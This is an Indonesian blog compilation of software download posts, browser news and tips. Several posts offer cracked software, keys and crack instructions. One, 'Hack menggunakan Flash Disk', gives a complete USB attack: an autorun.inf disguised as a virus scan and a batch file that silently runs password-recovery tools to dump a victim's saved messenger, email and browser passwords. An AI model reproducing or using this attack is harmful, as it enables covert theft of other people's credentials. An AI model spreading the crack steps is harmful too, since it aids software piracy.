Uniblue RegistryBooster 2010 + Power Suite

Uniblue RegistryBooster 2010+Powersuite ini adalah versi terbaru.Ini merupakan salah satusoftware yang diperlukan oleh komputer anda.
Registry Booster ini tidak lain tidak bukan adalah untuk memperbaiki registry yang rusak atau invalid atau gak dibutuhkan lagi sehingga keberadaannya di dalam harddisk komputer akan membuat suasana seperti semak belukar, jadi diperlukan tool untuk menghapus atau memperbaiki registry yang sudah error tersebut. Dengan merapikan registry-registry yang invalid juga bisa meningkatkan performa komputer supaya lelet-nya bisa berkurang, otomatis berpengaruh juga tuk mengurangi lelet-nya aktivitas browsing and surfing.
Uniblue RegistryBooster 2010,Sebelum melakukan repair dan menghapus registry ada baiknya mem-back up registries tersebut terlebih dahulu karena bisa jadi ada efek samping yang mengakibatkan eror saat membuka aplikasi yang lain, maka kita bisa meng-undo proses tersebut dengan melakukan restore backup registry.
Yang merasa komputernya lemot dan memerlukan ini silahkan langsung saja dari Mediafire

nb:Uniblue RegistryBooster 2010 sama speedup My PC bisa dipasang di win7 tapi untuk drivescanner memang      belum bisa, tapi itu drivescanner tidak usah diinstall juga tidak apa-apa tidak jadi masalah kok.

Time Stopper v2.00

Time Stoper v2.00
    Time Stopper v2.00 adalah software mungul yang mungkin sangat bermanfaat untuk anda.Gunakan aplikasi kecil ini untuk menggunakan Software anda selamanya. Time Stopper adalah sebuah program kecil yang dapat digunakan untuk menjalankan program terbatas waktu melebihi tanggal trial-nya. software ini tidak dimaksudkan untuk digunakan membantu pembajakan software-software.
     Namun lebih sebagai alat untuk memungkinkan pengguna untuk mengevaluasi perangkat lunak dengan periode yang lebih lama . dan pengguna dapat menemukan krack/id produknya.
bagi yang berminat silahkan unduh dari :
http://www.brothersoft.com

Extreme Copy Pro v1.5.1 Full Patch

Software ini memungkinkan untuk meningkatkan kinerja operasi dalam menyalin atau memindahkan file dan folder pada Windows. Menurut pengalaman dari pengguna, software ini dapat membantu memindahkan dan menyalin file 20-120% lebih cepat daripada menggunakan default windows.

Windows ExtremeCopy adalah utilitas dapat menyalin berkas menyalin dan memindahkan file dan folder yang sangat cepat dengan operasi yang sederhana mampu meningkatkan 20% ~ 120% lebih percepat dari program windows. Beberapa fitur canggih yang terdapat dalam software ini seperti proses jeda dalam menyalin, error recovery dll tetapi semudah seperti menyalinan menggunakan Windows default.

How to Crack:
* Install ExtremeCopy
* Masuk ke Configuration
* Hilangkan ceklist pada As Explorer’s default copying
* Copy dan Replace File ExtremeCopy.exe yang terdapat di folder Cracked EXE ke C:\Program Files\Easersoft\ExtremeCopy\

key features:

* Faster. ExtremeCopy copy and move files extreme fast, it will auto optimize speed and resource base on structure of physical machine, especially copy big files, it can reach to 8 times of Windows copying function.
* Controlable. You can pause / resume copy process when you need.
* Simply. The operation of copy / move files as simple as Windows default copying, you no need do anything once you installed ExtremeCopy which will replace Windows copying function as default, or change this default setting when you need. User Interface looks simple and friendly.
* Multiple Languages. Support multiple country languages of file name in order to keep original language text of file name.

Download:
Extreme Copy Pro v1.5.1 Full Patch
Sumber:iniSip.com

SpeedUpMyPC 2010 4.2.1.8 With Genuine Key


SpeedUpMyPC mempercepat program untuk komputer. Menurut para pengembang meningkatkan kecepatan bahkan mesin yang paling kuat. SpeedUpMyPC secara otomatis menentukan instalasi terbaik untuk komputer Anda dan mengelola sumber daya sistem, memberikan kinerja yang lebih baik. Dengan SpeedUpMyPC, Anda dapat membuat sistem pembersihan untuk memantau penggunaan sumber daya dan mempercepat kinerja.

SpeedUpMyPC memberikan kemampuan untuk memantau dan mengelola semua sumber daya komputer sederhana dengan satu klik. Pengaturan sistem, penggunaan internet, disk clutter, RAM dan CPU, semuanya akan secara otomatis scan, dibersihkan dan dioptimalkan untuk kinerja maksimum prestasi. Anda juga dapat menghentikan sebentar atau menghapus latar belakang dan proses startup, untuk menghasilkan kualitas tinggi multi-pass defragmentation disk dan mengepel, untuk mematuhi privasi, benar-benar menghapus data sensitif dan banyak lagi.

Fitur:
- Kinerja sistem pemindaian otomatis
- Overview of the CPU
- Meningkatkan fungsi prosesor
- Periksa penggunaan memori
- Optimalkan RAM
- Review dari penggunaan ruang disk
- Analisis dan Defragment hard drive
- Analisis dan optimalisasi kecepatan koneksi internet
- Startup Manager
- Task Manager
- Sistem Ikhtisar dan rekomendasi untuk meningkatkan produktivitas
- Crawling pada data yang tidak perlu atau tidak diinginkan
- Complete penghancuran data rahasia (opsional)
- Manager untuk uninstall
- Menyenangkan dan nyaman yuzersky antarmuka
- Jalankan program di sistem startup (opsional)
- Otomatis memulai pemindaian sistem pada program boot (opsional)
- Mulai, program ikon di baki sistem

Supported Systems:
- Windows 2000
- Windows XP
- Windows 7

Download SpeedUpMyPC 2010 4.2.1.8+key
Password: inisip.com

sumber:www.inisip.com

Download Accelerator Plus 9.4.0.5 Premium Full Version

Nah bagi para downloader sema skarang bisa sengan dikarenakan ada update terbaru dari DAP,Download Accelerator Plus sudah sampai versi 9.4.0.5 merupakan
salah satu download accelerator yang paling banyak digunakan,
menurut informasi dari website resminya DAP lebih dari 190 juta orang
menggunakan software ini, bahkan menurut pengalam DAP premium lebih cepat
dari Internet Download Manager (IDM) dan 400% lebih
cepat dari pada menggunakan default windows. Software ini mempunyai
beberapa tambahan peporme yang disempurnakan dari versi sebelumnya,
Beberapa perbaikan yang Terdapat dalam DAP 9,4 antara lain:

Power saluran untuk konsisten men-download
  • Fully featured Firefox integrasi
  • 64-bit Internet Explorer plug-in

Fixed:
  • Nama file deteksi saat menggunakan Yahoo web mail telah diperbaiki
  • Meningkatkan performa ketika menggunakan dan Kategori Simpan sebagai fitur download
  • Perbaikan login kericau terpadu antarmuka
  • Diselesaikan konflik ketika menggunakan fitur Setelah download selesai
  • Updated Terjemahan untuk beberapa bahasa

Known Bugs:

  • Pada kesempatan langka DAP tidak akan restart secara otomatis setelah mengubah bahasa, membutuhkan restart manual
  • Beberapa teks dalam bahasa non-Inggris tidak ditampilkan dengan benar

Fitur DAP Premium

* Download Speed
* Otomatis Mirroring Speed Boost
* Download Keamanan
* Pause & Resume
* Video Preview
* Trace Cleaner
* File Shredder
* ZIP Preview
* Private Downloads
* Twitter Integrasi

yang berminat silahkan Download Accelerator Plus 9.4.0.5 Premium Full Version
Password : inisip.com

sumber:iniSip.com


Bikin Lampu Keyboard Kayak Lampu Disko

Iseng memang kadang mengasikkan,ituu mkn yang bisa saya katakan.....
nah berikut yang lg pengen iseng ada tutor untuk iseng n funny,yaitu ngisengi kompi sendiri,wkwkkw kali ini dengan menggunakan script.
Script kali ini akan membuat lampu tombol dikeyboard (lampu Caps Lock, Num Lock, dan Scroll Lock) nyala secara bergantian layaknya lampu disko...
Seperti biasa, Silahkan copas script berikut ke notepad :

Alcohol 120% v2.0.0.1331


Alcohol 120% adalah cara yang ampuh Windows CD dan DVD burning software yang memudahkan untuk membuat backup DVD * dan CD. Selain itu, program ini memungkinkan Anda menyimpan CD yang paling banyak digunakan sebagai gambar pada komputer Anda, sehingga Anda dapat menghubungi mereka di klik sebuah tombol. Sekarang termasuk Pra-Menguasai fungsi dan mendukung format Blu-ray. Alkohol membawa arti baru pada kata multimedia! Hal ini tanpa diragukan lagi seorang pemimpin di kelasnya, sehingga kemampuan untuk meniru dan merekam CD dan DVD bersama menjadi satu luar biasa mudah untuk menggunakan program perangkat lunak.

Alcohol 120% bisa menyimpan CD yang paling sering digunakan sebagai gambar pada komputer Anda dan hanya memanggil mereka di klik tombol! Toko Anda yang paling digunakan atau CD penting sebagai gambar pada komputer Anda dan menjalankan mereka di kecepatan 200x dari sampai dengan 31 virtual CD atau DVD drive. Alkohol kompatibel dengan lebih dari 99% dari drive yang tersedia.

Alcohol 120% memungkinkan pengguna untuk membuat 31 virtual CD & DVD-ROM untuk memutar cakram tanpa memerlukan disk fisik, tetapi juga memungkinkan pengguna untuk menyalin CD & DVD ke CD-R / CD-RW / DVD-R / DVD-RW / DVD -RAM / DVD + RW. Alcohol 120% menggabungkan semua fungsi Alkohol 52% (CD & DVD emulation software).

Fitur Alcohol 120% v2.0.0.1331 Retail:


  1. Membuat 1:1 sempurna back-up CD, Alcohol 120% adalah benar-benar yang paling DVD / CD perangkat lunak emulasi dan membakar.
  2. Menyimpan penting yang paling banyak digunakan atau CD sebagai gambar pada komputer Anda dan menjalankan mereka pada kecepatan 200x dari sampai dengan 31 virtual CD atau DVD drive!
  3. Burn lebih dari satu CD atau DVD pada saat yang sama, bahkan dari dari berbagai sumber, dengan menggunakan pembakar beberapa teknologi terbaru.
  4. Tertinggi drive compatibility - Alkohol adalah kompatibel dengan lebih dari 99% dari drive yang tersedia dan jika tidak bekerja dengan drive anda kami dapat memperbaikinya jadi mari kita tahu!
  5. Bypass terbaru "unbreakable" Perlindungan menggunakan Software Alkohol keadaan seni pembakaran dan proses emulasi!
  6. Mendukung jumlah tertinggi yang mungkin termasuk jenis file gambar - MDS, CCD, BIN, CUE, ISO, CDI, bwt, BWI, BWS, BWA & banyak lagi ...
  7. Ultra-industri terkemuka responsif dukungan dari tim kami dari ahli perangkat lunak

Bagi yang mau mencoba silahkan download
Alcohol 120% v2.0.0.1331 Retail Full Version

Final Uninstaller v2.6.1.495


Final Uninstaller memberikan solusi mudah dan komprehensif untuk menguninstall program yang tidak diinginkan, baik yang berjalan dengan benar pada komputer atau telah rusak dan beberapa sisa-sisa setelah uninstall atau install gagal. Software ini tidak hanya menguninstall tetapi juga membersihkan semua file sampah dan menghapus entri registri tidak berlaku untuk mengoptimalkan PC yang akan memberikan performa maksimal komputer Anda.

Final Uninstaller dapat sepenuhnya menghapus lebih dari tujuh ratus aplikasi umum yang biasa digunakan seperti Windows Live Messenger, Adobe Reader, Avast!, AVG Anti-Virus, Antivirus BitDefender, ESET NOD32 Antivirus, Eset Smart Security, Kaspersky Anti-Virus, Norton AntiVirus, berbahaya browser plug-in dan banyak lagi aplikasi yang biasanya tidak bersih den meninggalkan sampah apabila hanya diuninstall dengan default windows.

Database
Final Uninstaller is based on a remnants database which contains abundance of data that stubborn left files have. With powerful database technologies and high-performance remains searching, Final Uninstaller can intelligently detect hidden leftover registry keys, files and folders and remove all remnants of a partially uninstalled program.

Special Uninstaller
Special Uninstaller is a Final Uninstaller plug-in that is specifically designed to safely and effectively uninstall software that involve complicated uninstall procedures, for example, anti-virus programs, spyware programs and programs in Adobe series, etc. It can better clean up the leftover registries and hidden files that caused by failed or incomplete uninstall.

Service
Final Uninstaller will be the better solution for completely uninstalling any unwanted application by providing both the powerful toolkit and on-demand services. If you fail to uninstall an application with Final Uninstaller, just submit it to us. We will add it into the database on demands of our users. That is, when you are using Final Uninstaller, you are not only having the handy toolkit but also the great services by our professionals.

Here are some key features of “Final Uninstaller”:

1. The industry-leading scanning engine can analyze and detect leftover files in background instead of manual intervention.
2. During the scanning process Final Uninstaller can detect stubborn leftover files including invalid uninstall registry entries, files, drivers, process and system services.
3. After scanning Final Uninstaller will list all applications that have been detected. You can view the detailed information about the leftover files and registry entries of a certain software to decide which one to uninstall.
4. According to the scan result, Final Uninstaller will select the most reasonable program to safely uninstall the application and well guarantee the Windows system stability. It can safely uninstall executive programs, system services, driver file(.sys) and the empty / corrupt registry entries that a certain application left over.
5. 1-click Scan and 1-click Clean make removing applications easily and even computer newbies can handle it without any problem.
6. Final Uninstaller has collected massive information of features that various leftover files have as its background database which supports real-time updating.
7. Though Final Uninstaller are powerful to remove most common software, it is not the ultimate tool to remove all software since new ones appeare everyday. When you failed to uninstall the unwanted software with Final Uninstaller, just submit the problems to us. Final Uninstaller will be the better solution for completely uninstalling any unwanted application by providing both the powerful toolkits and on-demand services.


Download Final Uninstaller v2.6.1.495 With Key
Password : inisip.com


Sumber:iniSipblog

Hack menggunakan Flash Disk

Hacking memang sesuatu yang sangat populer saat disamping berkembangnnya kemajuan tekhnologi..Nah,berikut yang saya share adalahsalah satu carany,Tapi ini cuma bukan mengajari jahat,tapi cuma sekedar share saja.
Nah langsung saja
Pertama-tama kita membutuhakan tools ini:

  • MessenPass: buat lihat password messenger yang paling populer contohnya: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.
  • PassView mail: melihat passowrd dari program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Gratis.
  • PassView mail juga dapat memulihkan password Web berbasis account email (Hotmail, Yahoo!, Gmail), jika Anda menggunakan program yang terkait account tersebut.
  • Passview IE: IE PassView adalah utilitas kecil yang mengungkapkan password yang disimpan oleh browser Internet Explorer. Baru mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 - v6.0
  • Protected Storage PassView: Sembuh semua password yang tersimpan di dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan banyak lagi ...
  • PasswordFox: PasswordFox adalah pemulihan password kecil alat yang memungkinkan Anda untuk melihat nama pengguna dan sandi yang disimpan oleh browser Web Mozilla Firefox. Secara default, PasswordFox menampilkan password disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah memilih untuk menonton password Firefox lain profil. Untuk setiap entri kata sandi, informasi berikut ini ditampilkan: Rekam Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons nama file.


Nah Tools Tersebut...dapat anda download dari Nirsoft

sebenernya banyak banget tools lainnya (dialuppass,cromepass) .tapi sesuaikan dengan keperluan aja, anda mau hack apa? firefoxnya, ym, msn, dll. pilihlah tools yang ada disana.

note: beberapa antivirus menggap itu sebagai virus..wajar si karena itu file yang mengrecovery password anda secara illegal. tapi dijamin itu nga menganggu system kamu.

Langkahnya2 :

  1. Download 5 Tools tersebut lalu taruh di flash diskmu tapi hanya yang .exe aja
    contoh : mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe

  2. Buka notepad lalu ketikan code berikut
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

lalu save dengan autorun.inf taruh di Folder Root FD mu

3.step ke 3...buka lagi notepad baru ketikan code berikut
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

lalu save dengan nama "launch.bat" save di FD mu juga

OK selesai !!!!

cara pake nya gmn?

1. Masukin FD mu...ntar Bakal muncul PopUp/AutoPlay( ini karena kita uda buat autorun.inf)
2. Di Windows Autoplay pilih "Perform a Virus Scan"
3.Nah..Pas u pilih option tadi, semua Id uda kehack ama tools tadi secara diem-diem. coba Sekarang buka FD kamu Semua Password Uda Kesimpan di File .Txt

WinRAR 3.93 Final


WinRAR hadir dengan versi terbarunya WinRAR 3.93 Final. WinRAR adalah sebuah aplikasi pengompres data dengan banyak fungsi tambahan. Dengan WinRAR kita dapat melakukan kompresi dan merapikan data sehingga akan menciptakan arsip yang lebih kecil dan tertata


WinRAR Fiture lainnya dari winrar ini adalah mendukung semua format kompresi populer ( RAR, ZIP, CAB, ARJ, LZH, ACE, TAR, GZip, UUE, ISO, BZIP2, Z and 7-Zip ) …. Dan jika anda punya ada folder2 ataupun files penting yang harus dan tidak ingin orang lain membukanya maka dengan program ini kita bisa memberi sebuah password di folder ataupun files itu

Jadi jika di PC kita banyak terdapat file yang berserakan maka kita bisa menyatukannya dengan program ini dan files yang telah disatukan tersebut secara otomatis akan ter kompress ukuran filenya sehingga tentunya akan menghemat ruang pada hardisk di PC kita.

silahkan kesini Download WinRAR 3.93 – x86 (32 bit)

Tempat penyimpanan file dokumen online gratis dan seumur hidup

Syaratnya mudah, kamu cuma perlu akun email di gmail. Setiap akun diberikan kapasitas penyimpanan sebesar 1 GB. Jadi kalo kamu punya 100 akun di gmail kamu punya kapasitas penyimpanan 100 GB!!!
File dokumennya bisa di download dengan kecepatan sesuai kecepatan koneksi internet kalian dan bisa di resume. Hebatnya menyimpan file di Google Doc ga ada batas penyimpanannya alias SEUMUUUUR HIIIDUUUUP!!! atau selama akun email kalian masih aktif.
nah bagi yang berminat silahkan kunjungi situs https://docs.google.com/


Download tanpa Limit dari RAPIDSHARE

Rapidshare ada sebuah media hosting yang sudah sangat terkenal di dunia internet.Nah bagi anda yang sering download dari Rapidshare dan tidak memiliki account premium pasti terkadang kesal akibat limit download perhari hanya bisa dilakukan 3 kaliapa lagi anda punya internet dikosan kemungkinan kecil untuk bisa download di Rapidshare.

Rapidshare seperti yang kita tahu bahwa terdapat banya file yang sangat menarik dan beguna bagi kita disana.Nah bagi anda yang suka mendownload dari rapidshare ada beberapa trik agar anda dapat download berkali-kali dari rapidshare tanpa account premium(kecepatan tidak sama seperti ang memiliki account premium
silahkan ikuti langkah berikut:

1. Bersihkan semua cache dan cookies
2. Jalankan command prompt
3. Ketik ipconfig /flushdns lalu enter
4. Ketik ipconfig /release lalu enter
5. Ketik ipconfig /renew lalu enter
6. Ketik exit lalu enter
7. Coba download kembali dari RS


Wise Registry Cleaner Pro 4.93 Build 236

Update terbaru dari Wise Registry Cleaner mempercepat PC Anda dengan membersihkan Registry. Wise Registry Cleaner adalah gratis gratis kuat registri bersih dan registry optimizer, itu kecepatan PC Anda dengan membersihkan Registry Windows Anda. Versi PRO membantu Anda meningkatkan performa PC Anda dengan mengoptimalkan Registry, dan itu sangat mudah, Anda hanya perlu melakukan beberapa klik. Wise Registry Cleaner adalah salah satu alat pembersih registry teraman yang tersedia di pasaran saat ini. Its mesin pemindaian menyeluruh, aman dan cepat.
Registry adalah jantung dari setiap komputer Windows. Yang lebih tua PC anda, semakin dibuang-up dengan Registry menjadi. Program yang ditulis dengan buruk (dan ada banyak orang di sekitar) tidak repot-repot untuk membersihkan Registry ketika anda menanggalkan mereka, dan beberapa program yang tidak perlu menambahkan sampah ke Registry. Lebih dibuang-up Registry Anda, semakin besar kemungkinan untuk crash atau untuk memperlambat PC Anda.
Hasil pengecekan melakukan pekerjaan rapi Registry membersihkan sampah. Itu scan Registry, lesu yatim atau buruk entri registry, dan menampilkan nama dan nilai-nilai untuk masing-masing. Registry mengidentifikasi entri yang dapat membahayakan menghapus, dan mereka yang aman untuk dihapus, sehingga Anda dapat membedakan antara keduanya. Ini juga memungkinkan Anda memutuskan untuk menghapus entri, dan yang tetap. Demi keamanan, itu juga dapat membuat cadangan Registry sebelum scan, sehingga Anda dapat memulihkan itu, jika program menyebabkan masalah.



  • Wise Registry Cleaner meningkatkan performa PC Anda dengan mengoptimalkan sistem anda (Fitur ini hanya termasuk dalam Professional Edition).
  • Fitur Utama:
  • Wise Registry Cleaner adalah salah satu alat pembersih registry teraman yang tersedia di pasaran saat ini. Its mesin pemindaian menyeluruh, aman dan cepat.
  • Wise Registry Cleaner scan registri Windows dan menemukan informasi yang salah atau usang dalam registri. Dengan memperbaiki informasi usang dalam Windows registry, sistem anda akan beroperasi lebih cepat dan lebih efisien.
  • Setelah Wise Registry Cleaner menganalisa sistem anda untuk masalah, Anda dapat melihat setiap masalah yang ditemukan sendiri-sendiri dan memanggil penjelasan rinci masing-masing. Jika Anda ingin, Anda juga dapat memiliki semua masalah diperbaiki secara otomatis.
  • Semua perubahan pada sistem anda yang dipantau oleh Wise Registry Cleaner dan dapat dibatalkan dengan beberapa klik mouse, sehingga Anda dapat menggunakan Wise Registry Cleaner tanpa khawatir bahwa perubahan yang tidak dapat dibalik.
  • Meningkatkan kinerja PC Anda dengan beberapa klik. (Fitur ini hanya termasuk dalam Professional Edition)
  • Dukungan jadwal tugas, Anda dapat mudah untuk menentukan jadwal tugas untuk Wise Registry Cleaner.
  • Operating System: Windows 98/me/NT/2000/XP, x64/2003/Vista XP, Vista x64/2008 server.
silahkan unduh dari Hotfile.com

Auslogics Disk Defrag 3.1.3.100


Auslogics Disk Defrag adalah yang kompak dan defragmentation cepat alat yang mendukung FAT 16/32, dan sistem file NTFS. It's disertakan dengan teknik pengoptimalan disk canggih, yang akan memperbaiki sistem anda dan crash kelesuan disebabkan oleh fragmentasi disk.

Menyebabkan fragmentasi disk sistem slowdowns, PC crash, lambat startups dan shutdowns. Auslogics Disk Defrag dirancang untuk cepat defragmentasi hard disk modern.

Fitur:

* Defrag dan mengoptimalkan
* Gratis ruang konsolidasi
* Sistem penempatan file cerdas
* Menjaga MQ zona reserved jelas
* Single file atau folder defragmentasi
* Daftar file terfragmentasi
* Auto-defrag modus
* Scheduled defragmentasi
* Customizing disk defrag
silahkan download di Filehippo
Sumber:Filehippo

CCleaner,2.21.940

Ccleaner adalah sebuah program yang bersifat freeware yang rasanya harus kita miliki di komputer kita.Ccleaner Ukuran file program sangat kecil namun memilik banyak keunggulan, manfaat dan feature. Program ini bekerja dan berguna untuk membersihkan Computer kita dari file yang sudah tidak terpakai, memperbaiki registry, histories cookies pada semua browser anda dan yang temporary dari sistem anda, sehingga akan membuat Windows lebih cepat dan ringan, dan juga secara efisien memberi anda lebih banyak ruang pada hard disk.
CCleaner adalah sebuah freeware sistem optimasi dan privasi alat. Ini menghapus file yang tidak terpakai dari sistem anda - memungkinkan Windows untuk berjalan lebih cepat dan membebaskan ruang hard disk yang berharga. Ini juga membersihkan jejak aktivitas online Anda seperti sejarah Internet Anda. Tapi yang terbaik adalah bahwa itu cepat (biasanya mengambil kurang dari satu detik untuk menjalankan) dan berisi NO Spyware atau Adware!


CCleaner v2.21.940 Baru Diperbarui:
  • Ditambahkan dukungan U3 smart drive. (Pisahkan installer)
  • Added support for: Adobe Reader 9.0, Adobe Photoshop CS3, Adobe Photoshop CS4, Adobe Illustrator CS4, Nero Burning ROM 9, OpenOffice 3.1, AVG AntiVirus 8.0, AntiVir Desktop dan Vuze.
  • Ditambahkan Dipasang tanggal dan ukuran untuk Uninstall Tool.
  • Ditambahkan dukungan untuk beberapa item seleksi pada Nyalakan alat.
  • Added support untuk Windows 2008 IIS membersihkan file log.
  • Peningkatan Windows 7 dukungan.
  • Peningkatan 64-bit Registry keakuratan pembersihan.
  • Peningkatan pemuatan System Restore Tool.
  • Peningkatan berbagai rutinitas dalam kode uninstaller.
  • Mengatasi Windows 7 Task Scheduler bug.
  • Mengatasi  "Tidak DiskÂ" bug ketika menggunakan Lap Free Space.
  • Mengatasi Win98 dukungan. Minor teks dan perbaikan terjemahan.
  • Minor bug fixes.

silahkan unduh dari Indowebster

K-Meleon 1.5.4 Browsing

K-Meleon adalah sangat cepat,K-Meleon 1.5.4 bisa kustomisasi dan ringan browser web didasarkan pada layout engine Gecko yang dikembangkan oleh Mozilla yang juga digunakan oleh Firefox. K-Meleon bebas, perangkat lunak open source yang dirilis di bawah GNU General Public License dan dirancang khusus untuk Microsoft Windows (Win32) sistem operasi.

Pilih bookmark yang Anda inginkan sistem:


  1. "Tabbed" browsing
  2. Mouse gerak
  3. Lengkapi toolbar, menu, menu konteks, & cara pintas keyboard kustomisasi
  4. Blokir jendela popup
  5. Fast waktu buka
  6. Easy pencarian web
  7. Theme & kulit
  8. Macro


silahkan

Photobucket




Sumber:KLIK



Silverlight Browsing


Microsoft Silverlight adalah web browser yang dapat diprogram plugin yang memungkinkan fitur seperti animasi, vektor grafis dan audio-video playback sehingga Anda dapat mengalami aplikasi Internet kaya.

Silverlight menawarkan model pemrograman yang fleksibel yang mendukung AJAX, VB, C #, Python, dan Ruby, dan terintegrasi dengan aplikasi Web yang ada.

Mendukung cepat, efektif biaya pengiriman video berkualitas tinggi untuk semua browser utama berjalan pada sistem operasi Mac atau Windows.
silahkan

Photobucket

Sumber:KLIK

Google Chrome terbaru (Update)

Pengadopsi awal membangun menjalankan pengujian yang paling maju telah versi Chrome tersedia update baru, yang dirancang untuk memperbaiki masalah yang berdampak pada keandalan dari browser. Google Chrome 5.0.356.2 adalah untuk diperebutkan melalui saluran Dev dan dirancang untuk memperbaiki masalah di mana tab mendapatkan beku ketika pengguna melakukan tindakan menyeret. Pada titik ini pada waktunya, Mountain View berbasis 5.0.356.2 dirilis raksasa pencarian tidak hanya untuk Windows, tetapi juga untuk Mac OS X dan Linux.

"Kami telah merilis Google Chrome 5.0.356.2 ke saluran Dev pada Windows dan Mac untuk memperbaiki masalah di mana menyeret sesuatu dengan mouse anda akan membeku tab," ungkap Mark Larson, Tim Google Chrome. Menurut Larson, tidak ada masalah tambahan diselesaikan dengan saluran Dev terbaru rilis Chrome.

Ketika bug dilaporkan, langkah-langkah yang diperlukan untuk mereproduksi masalah juga dijelaskan. "Load halaman Web manapun. Pilih konten. Cobalah untuk tarik di suatu tempat. Halaman terkunci dan menjadi tidak responsif terhadap masukan dari pengguna saat itu, "membaca entri pada proyek pengembangan Kromium.

Seminggu yang lalu sudah cukup sibuk untuk Google, dengan tidak kurang dari tiga refresh dikirimkan melalui saluran Dev. Selain itu, perusahaan Mountain View juga mendorong keluar dari 4,1 Chrome Beta dan masuk ke saluran Stabil menyampaikan hal itu kepada semua pengguna Windows. Berbeda dengan Dev rilis, Chrome 4.1 tersedia secara eksklusif untuk pengguna Windows.

Minor update ke versi 4.0 dirilis pada awal tahun ini membuka jalan ke versi 5.0 dari Chrome. Ketika memperkenalkan perkembangan Beta pertama tonggak dari Chrome 4.1, Google menekankan bahwa update to 4.0 ini dirancang untuk memperkenalkan fitur pada awalnya direncanakan untuk v5, yaitu Terjemahkan Infobar dan baru pilihan privasi. Pengguna yang tidak nyaman dengan software pre-release tidak boleh menjalankan pelepasan saluran Dev Chrome 5.0, tetapi seharusnya tetap dengan versi 4.1.

Photobucket


Safari Browser (Update)

Di safari4 Final ini akan menampilkan tampilan dari situs-situs favorit dalam bentuk tumbnail ketika membuka tab baru namun dengan visualisasi yang lebih menarik dari Speed Dial pada Opera atau thumbnail Most Visted pada Google Chrome. Pada Fitur Top Sites dapat menampilkan hingga 24 thumbnails pada satu halaman.


Beberapa vitur yaitu Cover Flow, Safari 4 akan menampilkan Visualisasi yang menarik ketika ingin meninjau situs yang pernah dibuka dan situs yang telah di-bookmark. Safari 4 memungkinkan melihat tampilan penuh dan sama persis seperti ketika halaman web dibuka terakhir kalinya.

langkah-langkah:
Pergi ke Software update dan mencari Safari 4,05. diperlukan Install dan restart .


  1. Peningkatan kinerja untuk Top Sites
  2. Stabilitas perbaikan untuk pihak ke-3 plug-in
  3. Stabilitas perbaikan situs dengan mengisi formulir online dan Scalable Vector Graphics
  4. Fixes sebuah isu yang mencegah Safari dari merubah setingan pada beberapa Linksys router
  5. Fixes sebuah isu yang mencegah beberapa pengguna dari iWork.com mengomentari dokumen
  6. Jika Anda Menggunakan Browser Safari pada PC dengan OS Windows 7, Windows Vista atau Windows XP, Anda akan Merasa seperti tidak asing. Hal ini disebabkan karena Safari memiliki tampilan dan menyerupai asli seperti aplikasi Windows lainnya, termasuk judul bar, perbatasan, dan toolbar.
berminat??
silahkan unduh dari www.apple.com

Flock terbaru(Update)

Mungkin andamerasa baru dengan aplikasi browing yang satu ini,tapi walaupun terbilang baru software cukup memliki beberapa fitur menarik.Memang software ini hampir sama dengan FF sehingga anda tidak terlalu sulit dalam pengoperasiannya.
beberapa fitunya:

  1. Keep In Touch – Tetaplah terhubung dengan teman Anda dan segala aktivitas mereka. Flock memastikan Anda tidak ketinggalan berita.
  2. It’s Cool To Share – Flock memungkinkan fungsi drag and drop sehingga Anda dapat berbagi secara mudah dengan teman-teman Anda.
  3. Make the News: Publish Yourself – Flock mempermudah blogging dan upload foto ke layanan-layanan populer dengan mudah. Cukup login ke layanan favorit Anda dan Anda akan dapat terhubung secara instant dari mana pun.
  4. Easy Access – Flock menghubungkan Anda secara otomatis dengan lebih dari 20 layanan online. Cukup login, Flock melakukan sisanya.
  5. Stay Informed and Be Heard – Flock memberikan fitur-fitur yang tidak bisa ditemukan di browser lainnya, entah Anda yang membuat berita atau Anda yang membaca berita.

ingin mencoba??

Photobucket



Mozila Firefox 3.6 (Update)

Siapa yang tidak kenal dengan aplikasi browsing yang sudah sangat familiar ini.Nah bagi anda pengguna setia Mozila firefox versi terbarunya sudah adadi versi terbu ini anda akan merasakan perubahan yang sangat signifikan terutama dalam hal kecepatan akses, di versi terbarunya ini Firefox menjanjikan loading awal yang lebih cepat, serta kesetabilan kinerja nikmati dan rasan kenyamanan menjelajahi internet..

Photobucket


Internet Explorer 8


Untuk anda yang masih menggunakan Internet Explorer 6 atau IE6 diharapkan untuk melakukan upgrade ke versi terbaru Internet Explorer 8. Selain terdapat celah keamanan, mulai 1 Maret 2010 anda tidak lagi dapat membuka situs Google dan layanan lainnya milik Google seperti Youtube. Karena Google telah menghentikan dukungan terhadap Internet Explorer 6 dan browser-browser tua lainnya

Jadi jika anda masih menggunakan Internet Explorer 6 atau browser tua lainnya, sangat disarankan untuk melakukan upgrade. Web Browser Terbaru selain memberikan kenyamanan dan kecepatan dalam melakukan browsing juga memiliki tingkat keamanan yang lebih baik dibandingkan dengan versi yang lama.
silahkan

Photobucket

Sumber:d60pc.com

Download Internet Explorer 9 Platform Preview

Internet Explorer 9 Platform Preview



Microsoft telah memperkenalkan generasi selanjutnya dari browser Internet Explorer, dengan hadirnya Internet Explorer 9. IE9 menggunakan mesin JavaScript baru yang disebut “Chakra” yang telah mendorong kinerja browser itu dibandingkan dengan versi terdahulunya IE8



IE9 juga telah mendukung HTML5 dan CSS3. IE9 mendukung GPU atau Hardware dalam akselerasi HTML5. Ini berarti bahwa gambar dan video HTML5 akan bermain jauh lebih baik pada IE9 karena akan menggunakan kartu grafis untuk performa yang lebih baik. Internet Explorer 9 juga menambah sejumlah fitur baru termasuk pemutaran video H.264, juga dikatakan IE9 akan lebih ringan ketika digunakan

